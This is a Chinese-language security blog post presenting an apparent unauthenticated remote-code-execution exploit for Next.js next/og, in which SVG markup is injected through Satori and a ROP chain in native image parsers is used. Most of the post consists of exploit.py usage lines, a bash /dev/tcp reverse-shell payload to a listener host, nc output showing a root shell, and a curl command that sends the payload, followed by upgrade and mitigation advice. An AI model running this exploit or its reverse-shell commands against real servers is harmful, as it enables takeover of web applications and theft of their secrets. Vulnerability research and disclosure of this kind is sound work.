文章总结: Next.js的next/og组件存在未经身份验证的远程代码执行漏洞,通过Satori将用户输入写入SVG而不进行转义,导致攻击者可以注入恶意SVG标记并执行任意代码。提供了漏洞详情、受影响版本、POC和修复建议。
综合评分: 85
文章分类: 漏洞分析,网络安全,代码审计,技术标准,解决方案
CVE-2026-94545 Next.js next/og 未经身份验证的远程代码执行 POC
酷酷信安
2026年9月30日 09:43
四川
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
为方便阅读显示,建议大家把酷酷信安“设为星标”
01 简介:
next/og它通过 Satori 将 JSX 渲染成 SVG,然后栅格化该 SVG 来构建 Open Graph 图像。Satori 会将用户提供的文本写入 SVG 而不进行转义(CWE-116),因此请求可以关闭外层元素并注入自身的 SVG 标记。当路由在sharp安装了相关库的 Node.js 运行时运行时,该 SVG 会由原生库(libvips、librsvg、libxml2)而非沙盒化的 wasm 渲染器进行栅格化。由XInclude 引用和嵌套 DTD 实体构建的有效负载会破坏原生解析器内部的内存。官方的 Node.js 二进制文件并非 PIE 版本,因此其代码和 GOT 未随机化,并且固定的 ROP 链可以到达而execve不会发生地址泄漏。只需向 OG 图像路由发送一个未经身份验证的请求,就足以以服务器进程的身份运行命令。
02 受影响的版本:
- Next.js 16.2.0 – 16.3.5(Node 运行时,
sharp已安装),Satori >=0.0.27 <0.33.5
03 POC :
存在漏洞的路由是POST /api/og。它获取请求体并将其放入 SVG 中,<title> 然后再进行光栅化。exploit.py为选定的命令构建该 SVG,将 ROP 链编码为 <path>,并将其发送到路由。
最简单的运行方式是打开一个反向 shell。给它目标地址和监听地址;它会自动启动nc ,发出请求,并将 shell 交给你。
python3 exploit.py --target 172.17.0.3:3000 --lhost 172.17.0.4:4444
有效载荷已针对“环境”中列出的堆栈进行校准,因此请在当前镜像或具有相同 Node 和 Sharp 构建版本的宿主机上运行它。如果成功,Node 进程将被您的命令替换,这意味着 HTTP 请求将关闭,服务将停止响应,直到容器重启。
[*] Command: bash -c 'bash -i>&/dev/tcp/172.17.0.4/4444 0>&1' (49 bytes)
[*] payload bytes=24693 sha256=...
[*] Listener: nc -lvnp 4444
[*] POST http://172.17.0.3:3000/api/og (24693 bytes)
[*] Target closed connection (expected)
connect to [172.17.0.4] from (UNKNOWN) [172.17.0.3] 43118
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux 6e2b1c4a7f9d 5.15.0 #1 SMP x86_64 GNU/Linux
反向 shell 作为服务器进程运行,它通过单个未经身份验证的请求来确认代码执行。要运行一个没有监听器的命令,可以直接传递该命令;请注意,输出不会通过 HTTP 返回,因此命令必须将任何想要查看的内容以带外方式发送。
# single command, no listener
python3 exploit.py --target 172.17.0.3:3000 --command "id"
# only build the payload, then send it yourself
python3 exploit.py --target 172.17.0.3:3000 --command "id" --output payload.bin curl --data-binary @payload.bin -H "Content-Type: text/plain" http://172.17.0.3:3000/api/og
修复版本:
- 升级到 Next.js 16.3.6 / Satori 0.33.5 或更高版本,该版本会在序列化 SVG 文本时对其进行转义,从而关闭注入。
- 如果暂时无法升级,请将
next/og路由移至export const runtime = 'edge'使用沙盒 wasm 渲染器的位置,或者移除路由sharp以避免访问原生路径,并将未经清理的用户输入排除在ImageResponse子进程之外。 - 将 OG 镜像路由置于身份验证或允许列表之后,并限制服务器的出站流量,以增加盲泄露的难度。
- 打完补丁后,将可通过互联网访问的实例视为已入侵:轮换应用程序进程可以读取的任何密钥,并检查其持久性
项目地址:
https://github.com/EQSTLab/CVE-2026-94545
往期推荐:
fastjson 1.2.66–83 rce 复现环境项目及POC
持续分享技术干货,喜欢这篇文章,记得三连哦!
免责声明:根据我国《计算机软件保护条例》第十七条规定:“为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬。”您需知晓本站所有内容资源均来源于网络,仅供用户交流学习与研究使用,版权归属原版权方所有,版权争议与本站无关,用户本人下载后不能用作商业或非法用途,需在24小时之内删除,否则后果均由用户承担责任
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:酷酷信安 《CVE-2026-94545 Next.js next/og 未经身份验证的远程代码执行 POC》